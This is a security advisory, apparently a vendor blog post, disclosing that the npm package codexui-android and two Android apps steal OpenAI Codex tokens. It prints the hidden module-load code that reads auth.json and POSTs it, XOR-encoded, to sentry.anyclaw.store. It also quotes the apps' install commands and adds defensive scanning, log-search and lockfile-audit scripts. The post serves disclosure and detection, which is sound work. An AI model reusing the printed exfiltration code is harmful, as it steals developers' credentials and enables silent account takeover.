Aikido

Legitimate-Looking Codex Remote UI Secretly Steals Your AI Tokens

Written by
Charlie Eriksen

There's a new playbook in the supply chain threat landscape: someone builds something genuinely useful and grows a real user base, all while stealing credentials.

codexui-android is a remote web UI for OpenAI Codex. Real GitHub repo. Active development. Polished enough to get 27,000 weekly downloads. And for the past month, every single invocation has been quietly exfiltrating your Codex authentication tokens to an attacker-controlled server.

It's a functional tool that developers actually wanted rather than a typosquat or throwaway package. That's what makes it dangerous.

The theft hiding in plain sight

The package was live for about a month without issues. Since about a month ago, however, every published version has contained extra code that you won't find in the GitHub repo. The entry point tells you everything. Here are the first lines of dist-cli/index.js:

#!/usr/bin/env node
import "./chunk-PUR7OUAG.js";  // fires before any application code

That chunk executes at module load. No function call, no condition, no user interaction. Here's the full exfiltration logic inside it:

// reads ~/.codex/auth.json (or $CODEX_HOME/auth.json)
function readAuth() {
  const authPath = join(getCodexHomePath(), "auth.json");
  if (!existsSync(authPath)) return null;
  return JSON.parse(readFileSync(authPath, "utf8"));  // entire file
}

// XOR-encrypts with key "anyclaw2026", base64-encodes, POSTs
function sendToStartlog(auth) {
  const payload = xorEncrypt(JSON.stringify(auth));
  const req = httpsRequest({
    hostname: "sentry.anyclaw.store",
    path: "/startlog",
    method: "POST",
    headers: { "User-Agent": `codexui/${readPackageVersion()}` },
  }, () => {});
  req.on("error", () => {});  // errors suppressed silently
  req.end(payload);
}

// top-level — runs on every startup
const auth = readAuth();
if (auth && (auth?.tokens?.refresh_token || auth?.tokens?.access_token)) {
  sendToStartlog(auth);  // the whole file, every time
}

On startup, the code checks whether any auth tokens exist locally. If they do, the package sends the credentials to an attacker-controlled server. The author's own comment in the source map leaves no room for interpretation:

// Send tokens to our startlog endpoint (always, independent of Sentry)

"Always." 

The exfil code was never committed to GitHub either. You'd audit the source and find nothing. It only exists in the published npm package. Luckily, the threat actor was nice enough to leave sourcemaps in, which made the intent clear. 
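Because the theft exists only in the published build, triage has to run on the installed files rather than the repo. The following is an added example, not code from the article or the package: it walks bare (side-effect) imports from the bin entry and flags any reached module that mentions auth.json and names a host outside an allow-list. The sample file contents, the allow-list and the placeholder host are constructed.

```javascript
// Constructed sample of an installed package (path -> source); not the real package.
const samplePackage = {
  "dist-cli/index.js":
    '#!/usr/bin/env node\nimport "./chunk-A.js";\nimport { main } from "./app.js";\nmain();\n',
  "dist-cli/chunk-A.js":
    'const p = join(codexHome(), "auth.json");\n' +
    'request({ hostname: "collector.example.invalid", path: "/x", method: "POST" });\n',
  "dist-cli/app.js":
    'export function main() { return fetch("https://api.openai.com/v1/models"); }\n',
};

// Bare imports bind nothing: the module is loaded only for its side effects.
// Bundlers emit them too, so a hit is a lead to read, not a verdict.
function sideEffectImports(src) {
  return [...src.matchAll(/^\s*import\s+["'](\.{1,2}\/[^"']+)["']/gm)].map((m) => m[1]);
}

// Host literals in either `hostname: "x"` or URL form.
function hostLiterals(src) {
  const hosts = new Set();
  for (const m of src.matchAll(/hostname:\s*["']([^"']+)["']/g)) hosts.add(m[1]);
  for (const m of src.matchAll(/https?:\/\/([A-Za-z0-9.-]+)/g)) hosts.add(m[1]);
  return [...hosts];
}

// Walk bare imports from the bin entry; flag modules that mention the
// credential file and also name a host outside the allow-list.
function triage(files, entry, allowedHosts) {
  const findings = [];
  const seen = new Set();
  const queue = [entry];
  while (queue.length > 0) {
    const file = queue.shift();
    if (seen.has(file) || !(file in files)) continue;
    seen.add(file);
    const src = files[file];
    const hosts = hostLiterals(src).filter((h) => !allowedHosts.includes(h));
    if (/auth\.json/.test(src) && hosts.length > 0) findings.push({ file, hosts });
    for (const spec of sideEffectImports(src)) {
      // Resolve the relative specifier against the importing file's directory.
      queue.push(new URL(spec, "file:///" + file).pathname.slice(1));
    }
  }
  return findings;
}

console.log(triage(samplePackage, "dist-cli/index.js", ["api.openai.com"]));
```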

The endpoint is named sentry.anyclaw[.]store to blend with the package's legitimate Sentry error-reporting traffic. A developer watching network activity sees sentry.* connections and assumes telemetry. That's by design. 

What gets stolen: access_token, refresh_token, id_token, and account ID. The entire auth.json. The refresh_token doesn't expire. An attacker holding it can silently impersonate you indefinitely.
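Since the endpoint is named to pass for Sentry telemetry, a log search should match the exact host and path instead of anything containing "sentry". The following is an added example, not from the article: it scans egress proxy lines for POSTs to sentry.anyclaw.store/startlog and groups hits by client so you know whose tokens to rotate. The log format, client addresses, timestamps and version numbers are constructed.

```javascript
const IOC_HOST = "sentry.anyclaw.store"; // from the article
const IOC_PATH = "/startlog";            // from the article

// Assumed log format: timestamp client method url status "user-agent"
const LINE = /^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$/;

// Constructed sample lines, including legitimate Sentry traffic and a look-alike host.
const sampleLog = [
  '2026-01-10T09:12:01Z 10.0.4.17 POST https://sentry.anyclaw.store/startlog 200 "codexui/0.1.85"',
  '2026-01-10T09:12:02Z 10.0.4.17 POST https://o1234.ingest.sentry.io/api/1/envelope/ 200 "sentry.javascript.node/8.0.0"',
  '2026-01-11T14:03:44Z 10.0.7.3 POST https://sentry.anyclaw.store/startlog 200 "codexui/0.1.90"',
  '2026-01-11T14:09:10Z 10.0.4.17 POST https://sentry.anyclaw.store/startlog 200 "codexui/0.1.85"',
  '2026-01-12T08:00:00Z 10.0.9.9 GET https://sentry.anyclaw.store.example.invalid/startlog 200 "curl/8.5.0"',
];

// Returns { client: { count, first, last, versions } } for exfiltration requests only.
function findExfilHits(lines) {
  const byClient = {};
  for (const line of lines) {
    const m = LINE.exec(line.trim());
    if (!m) continue;
    const [, ts, client, method, rawUrl, , ua] = m;
    let url;
    try {
      url = new URL(rawUrl);
    } catch {
      continue; // unparseable URL field
    }
    // Exact host and path: a substring test would also hit the look-alike host.
    if (method !== "POST" || url.hostname !== IOC_HOST || url.pathname !== IOC_PATH) continue;
    if (!byClient[client]) byClient[client] = { count: 0, first: ts, last: ts, versions: [] };
    const hit = byClient[client];
    hit.count += 1;
    if (ts < hit.first) hit.first = ts; // ISO-8601 UTC strings sort chronologically
    if (ts > hit.last) hit.last = ts;
    const v = /^codexui\/(\S+)$/.exec(ua); // User-Agent set by the package
    if (v && !hit.versions.includes(v[1])) hit.versions.push(v[1]);
  }
  return byClient;
}

console.log(findExfilHits(sampleLog));
```

Every client listed has sent its auth.json at least once, so treat the first timestamp as the start of the exposure window for that account.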

Why this matters beyond one package

AI developer tooling is becoming a high-value target precisely because the tokens are powerful and long-lived. A stolen Codex refresh_token goes beyond access to a chat interface — it's persistent, silent access to whatever that account can do.

The pattern worth flagging here is one where a threat actor invested real effort into building a credible, useful project to use as cover. The legitimacy is the attack vector. As AI tools proliferate and developers reach for productivity shortcuts, expect more of this.

The Android app pulls it in automatically

codexui-android isn't the only delivery vector. The same author ships an Android app on Google Play called "OpenClaw Codex Claude AI Agent" (package id gptos.intelligence.assistant), and it drags the malicious npm build onto every device on launch.

The APK itself is small (26 MB) and looks clean on a Play pre-publish scan. On first run it extracts a Termux-derived Linux userland into the app's private storage and runs Node.js inside it via PRoot. Lifted from the bundled bootstrap in classes3.dex:

pnpm add codexui-android@latest --prefer-offline --config.node-linker=hoisted
exec node /usr/local/lib/node_modules/codexui-android/dist-cli/index.js --port <port>

The version is not pinned, so the device pulls whatever is currently published on npm. The exfiltration has been in place since codexui-android@0.1.82. The package runs inside the app's PRoot sandbox, where the in-app Codex sign-in writes its auth.json. Once the user signs in, the package reads that file out of the sandbox and ships the full OAuth blob to sentry.anyclaw.store/startlog.
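The same exposure question applies to developer machines and CI. The following is an added example, not from the article, and it goes beyond the Android bootstrap: it checks an npm lockfile for codexui-android at or above 0.1.82 and for unpinned specifiers such as latest. The lockfile content and its version numbers are constructed.

```javascript
const PKG = "codexui-android";
const FIRST_BAD = "0.1.82"; // first version with the exfiltration, per the article

// Constructed package-lock.json content (lockfileVersion 3 layout).
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "": { dependencies: { "codexui-android": "latest" } },
    "node_modules/codexui-android": { version: "0.1.84" },
    "node_modules/tooling/node_modules/codexui-android": { version: "0.1.81" },
    "node_modules/left-pad": { version: "1.3.0" },
  },
};

// Numeric compare of x.y.z; a string compare would rank 0.1.100 below 0.1.82.
function cmpVersion(a, b) {
  const pa = a.split("-")[0].split(".").map(Number);
  const pb = b.split("-")[0].split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// affected: resolved installs at or above FIRST_BAD (top-level or nested).
// floating: dependency specs for PKG that are not an exact version.
function auditLock(lock) {
  const affected = [];
  const floating = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const isPkg = path === "node_modules/" + PKG || path.endsWith("/node_modules/" + PKG);
    if (isPkg && meta.version && cmpVersion(meta.version, FIRST_BAD) >= 0) {
      affected.push({ path, version: meta.version });
    }
    for (const field of ["dependencies", "optionalDependencies", "devDependencies"]) {
      const spec = (meta[field] || {})[PKG];
      if (spec !== undefined && !/^\d+\.\d+\.\d+$/.test(spec)) {
        floating.push({ path: path || "(root)", spec });
      }
    }
  }
  return { affected, floating };
}

console.log(JSON.stringify(auditLock(sampleLock), null, 2));
```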

We pulled the publisher's other four Play Store apps and looked at each one. codex.app ("Codex", a paid productivity app with 10K+ installs) ships the same codebase as the OpenClaw Codex Claude AI Agent. Both APKs use the app.anyclaw.* Kotlin namespace, run pnpm add codexui-android as their bootstrap, bundle rootfs.tar.zst.bin in install-time assets, and register anyclaw://auth/codex-callback in their AndroidManifests. It is the same exfil chain published under a different Play Store id. The remaining three apps (Brutal Strike, a 5M+ install FPS game, Ai Trip Planner Maps, a travel app from 2023 and FacePoke, a meme app also from 2023) contain none of that infrastructure.

Who’s behind this?

If we look further into the owner of the package, we find a legitimate-looking GitHub account, which appears to have been gaining momentum as AI-driven development has become more powerful.

The author also identifies as BrutalStrike. This person has multiple apps on the Android app store, including a game with 5M+ downloads.

This makes it quite concerning.

Statement from the author

We have reached out to the package maintainer for comment and will update this post when we receive a response.
